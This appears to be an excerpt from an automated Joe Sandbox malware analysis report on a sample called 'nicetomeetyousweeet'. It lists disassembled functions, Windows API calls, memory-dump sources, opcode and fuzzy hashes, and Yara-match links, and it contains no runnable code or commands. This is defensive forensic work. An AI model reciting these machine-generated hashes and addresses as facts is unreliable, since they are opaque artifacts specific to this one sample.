                                                                                • Opcode Fuzzy Hash: 39b6845edf5822fb0cb5ec1b15846e624abd352d664abc6135ad0e1aa048f885
                                                                                • Instruction Fuzzy Hash: 69F04C323003046FDB246F359C95B7A7BA1EFC0358F45803DF90187780D6759C42C650
                                                                                Function 007C77FE Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,007C39B1,?,00000004), ref: 007C7851
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                • Instruction ID: 6f6cb49ee0c271d648559e2e8dea67467d7d7896ae317e3e1b12f975f336001d
                                                                                • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                • Instruction Fuzzy Hash: A8F0F031A48308FBCB15AF609C0AFBE7B65EF04B12F00016DFC0526252CE75AE10DA9A
                                                                                Function 004470AE Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(-0003D155,?,0044225B,00000000,0046DAC0,0000000C,00442216,?,?,?,00448739,?,?,00446F74,00000001,00000364), ref: 00444ADB
                                                                                • EnumSystemLocalesW.KERNEL32(Function_00047068,00000001,0046DC48,0000000C), ref: 004470E6
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                • String ID:
                                                                                • API String ID: 1272433827-0
                                                                                • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                                                • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                                                Function 007C7315 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 007C4D33: RtlEnterCriticalSection.NTDLL(?), ref: 007C4D42
                                                                                • EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 007C734D
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                • String ID:
                                                                                • API String ID: 1272433827-0
                                                                                • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                • Instruction ID: 0978113c59c2a321652b08cbf4a46ffef24eddd3dffd5ee2ab4fefb992633b49
                                                                                • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                • Instruction Fuzzy Hash: 8CF0F932A50204EFD714EF68EC4AF9D77B0EB45721F10816AF914DB2A2CB7889819B59
                                                                                Function 00450CF7 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                • EnumSystemLocalesW.KERNEL32(00450C4E,00000001), ref: 00450D2E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                • String ID:
                                                                                • API String ID: 1084509184-0
                                                                                • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                                                • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                                                Function 0040E679 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: ff71cb212e48055ef4d542031bbd08f4c06058921c3c5a9636dfb358e22ebb72
                                                                                • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                                • Opcode Fuzzy Hash: ff71cb212e48055ef4d542031bbd08f4c06058921c3c5a9636dfb358e22ebb72
                                                                                • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                                                Function 0078E8E0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00794814,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,0046673C), ref: 0078E8F4
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                                                • Instruction ID: 6706795259860e38c4d693ae929a1c0a34e59eacafff9808fd11a6b6f03d90e6
                                                                                • Opcode Fuzzy Hash: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                                                • Instruction Fuzzy Hash: D8D09E75744218BBEA14A6959C0EE9B7A9CE741BA6F100165BA01D72C1E9A0AE048BE1
                                                                                Function 00433CD7 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                                                • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                • Instruction Fuzzy Hash:
                                                                                Function 0043CE3B Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: BG3i@
                                                                                • API String ID: 0-2407888476
                                                                                • Opcode ID: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                                                • Instruction ID: a817909710d0090f483bb13cdd1d1ee80d6dfae79024daed79820ace932836b2
                                                                                • Opcode Fuzzy Hash: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                                                • Instruction Fuzzy Hash: E361777160070966DA385A2858D6BBF6396EB0DB04F10391BE943FF3C1D61DAD43874E
                                                                                Function 0043CC0C Relevance: 1.5, Strings: 1, Instructions: 214COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0
                                                                                • API String ID: 0-4108050209
                                                                                • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                • Instruction ID: e47b97b21f836cd03f295ee90de6feb37cae4df0254a032430ab3cefd666e269
                                                                                • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                • Instruction Fuzzy Hash: C851AC3160070457DF388A6985DA7BF6B959B0E700F18352FE48AFB382C60DED02979E
                                                                                Function 007BCC44 Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0
                                                                                • API String ID: 0-4108050209
                                                                                • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                • Instruction ID: 527c486c15381fac658ede9616926f163dcb61da6d5c04cd9894b801804812b4
                                                                                • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                • Instruction Fuzzy Hash: CC519C7530064497DF374678846A7FF2F989B62300F18C96AE88BCB282E64DDD019371
                                                                                Function 007BCE73 Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 0
                                                                                • API String ID: 0-4108050209
                                                                                • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                • Instruction ID: fce45feed96008ed763e9370954dd6cb793d6a85f978bead38070114213d8391
                                                                                • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                • Instruction Fuzzy Hash: E7517C63600644DFDB36597C85597FF67DB9B02340F18C99AF842CB282D61DED068361
                                                                                Function 00426E73 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @
                                                                                • API String ID: 0-2766056989
                                                                                • Opcode ID: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                                                • Instruction ID: 4dd25ef8aece06dcbd44762d080e1d81d96ea4c89eb3931c7e752ffea448aa68
                                                                                • Opcode Fuzzy Hash: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                                                • Instruction Fuzzy Hash: 99417576A083158FC314CE29D18021BFBE1FBC8300F568A2EF99693350D679E980CB86
                                                                                Function 007A70DA Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @
                                                                                • API String ID: 0-2766056989
                                                                                • Opcode ID: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                                                • Instruction ID: 3dec310ed24065cfd2c01f98b71f03cee3b28303e4cb5b96fe88a158e62a3cc0
                                                                                • Opcode Fuzzy Hash: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                                                • Instruction Fuzzy Hash: A74127759187098FC318CF29C58061BFBE1FBD9354F548A2EF99693350D679A980CF82
                                                                                Function 0044E92E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: HeapProcess
                                                                                • String ID:
                                                                                • API String ID: 54951025-0
                                                                                • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                                                                • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                                                                Function 0044C739 Relevance: .6, Instructions: 637COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                                                                • Instruction ID: 1fbb2d6a6e610910e1865e113166bba559d0ad1400e2c5ed2b94208389d41108
                                                                                • Opcode Fuzzy Hash: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                                                                • Instruction Fuzzy Hash: 4E323621D2AF014DE7639634C862336A649AFB73C5F19D737F81AB5AA6EB2CC4C34105
                                                                                Function 0041E5DF Relevance: .6, Instructions: 606COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fa4366285c09898dbebe4e06eb7cc19ae7dd04f2b52c354052fc3ff454ee4381
                                                                                • Instruction ID: 2a34495ee4f42e5442afe8381c33b9994a027dd0bc8bc0cc3fe6fc4803c66e78
                                                                                • Opcode Fuzzy Hash: fa4366285c09898dbebe4e06eb7cc19ae7dd04f2b52c354052fc3ff454ee4381
                                                                                • Instruction Fuzzy Hash: 9732C1796087469BD714DF2AC4807ABB7E1BF84304F444A2EFC958B381D778DD858B8A
                                                                                Function 0079E846 Relevance: .6, Instructions: 606COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a18e7bb7c2c42d1902aff7cdab2f32fbef15b0e2cf6e19f50b6dfc23c9c72e89
                                                                                • Instruction ID: 56dbb753c92c7b11badc350d9bc34f618bdec9312fe4fd45070f655e70039b7f
                                                                                • Opcode Fuzzy Hash: a18e7bb7c2c42d1902aff7cdab2f32fbef15b0e2cf6e19f50b6dfc23c9c72e89
                                                                                • Instruction Fuzzy Hash: 3332E1716087469FDF19DF28D480B6AB7E5BF84304F044A2DF8A58B282E779DD05CB82
                                                                                Function 004267CB Relevance: .4, Instructions: 437COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5e7cfb39373056f24a3a904b548fd4815eb54790cbaced7075879559032304a0
                                                                                • Instruction ID: 022d1978040d43b7ea9bbfc0a41ffb8b00617051ae00cac38c3f572af68edcce
                                                                                • Opcode Fuzzy Hash: 5e7cfb39373056f24a3a904b548fd4815eb54790cbaced7075879559032304a0
                                                                                • Instruction Fuzzy Hash: 0D028F717046518FD318CF2EE880536B7E1AF8E301B46863EE585C7395EB74E922CB95
                                                                                Function 007A6A32 Relevance: .4, Instructions: 437COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
                                                                                • Instruction ID: 66b841e9e299e425b08dc54b03ee50dcf4b77ca5bdb1ab39f2322b2931b75eb3
                                                                                • Opcode Fuzzy Hash: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
                                                                                • Instruction Fuzzy Hash: 71028E717046518FD328CF2DE880536B7E1AF8A3017468A3EE585C7391EB34E922CB95
                                                                                Function 00426254 Relevance: .4, Instructions: 377COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 055be9041e2207fcccce4809f1574f7faa2e999c59950680925987e85d6ae2fe
                                                                                • Instruction ID: dd4ce2a6fae4266494c2f053a510589cf36d02151b1693af83bcfdcd1697f2cb
                                                                                • Opcode Fuzzy Hash: 055be9041e2207fcccce4809f1574f7faa2e999c59950680925987e85d6ae2fe
                                                                                • Instruction Fuzzy Hash: 55F13B716142548FC314DF1DE89187BB3E0EB8A301B460A2EF5C2D7392DB78E91ADB56
                                                                                Function 007A64BB Relevance: .4, Instructions: 377COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ae54c0c007aacb93a7dd55fc151a9a0813301b4ecfdd70e7c81fd1d8629b8821
                                                                                • Instruction ID: f49e8786ae396d1bafbe367ac73a97de9baea4ff3994bd004fed797e1bfdd7ac
                                                                                • Opcode Fuzzy Hash: ae54c0c007aacb93a7dd55fc151a9a0813301b4ecfdd70e7c81fd1d8629b8821
                                                                                • Instruction Fuzzy Hash: 10F13D716142548FC714DF1DE89187B73E0EB8A301B460A2EF5C2D7392DB78EA1ACB56
                                                                                Function 00431377 Relevance: .4, Instructions: 371COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6263245b1b66a904a13b3213984ac793822dab0d6340cc3b5a577027059b3e4a
                                                                                • Instruction ID: a134442df30985c3d9ded0ed06b90328dea8838589cb671b1bd0994677c35241
                                                                                • Opcode Fuzzy Hash: 6263245b1b66a904a13b3213984ac793822dab0d6340cc3b5a577027059b3e4a
                                                                                • Instruction Fuzzy Hash: 60D1A171A083158BC721DE29C88096FB7E4FFD8354F446A2EF88597361EB38DD058B86
                                                                                Function 0041D071 Relevance: .3, Instructions: 276COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                                                                                • Instruction ID: 86422b113df266cbb8d28aa4d41e6099a1760efb4c6ea83322c03ecd969c618c
                                                                                • Opcode Fuzzy Hash: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                                                                                • Instruction Fuzzy Hash: 46B1817951429A8ACB05EF28C4913F63BA1EF6A300F4851B9EC9CCF757D3399506EB24
                                                                                Function 0079D2D8 Relevance: .3, Instructions: 276COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1d5f87b89f6cc3a45a9bf331663a41d894a757e8db0ddd404c7656d5df1518eb
                                                                                • Instruction ID: ab2a7db36434afcf2ac5622ebbcdbc9ec845653f83f57f87e594a02dcd952e64
                                                                                • Opcode Fuzzy Hash: 1d5f87b89f6cc3a45a9bf331663a41d894a757e8db0ddd404c7656d5df1518eb
                                                                                • Instruction Fuzzy Hash: F5B173791142998BCF15EF64C4913F63BA1EF6A300F0851B9EC9CCF756E2398906EB64
                                                                                Function 00436A8D Relevance: .3, Instructions: 254COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
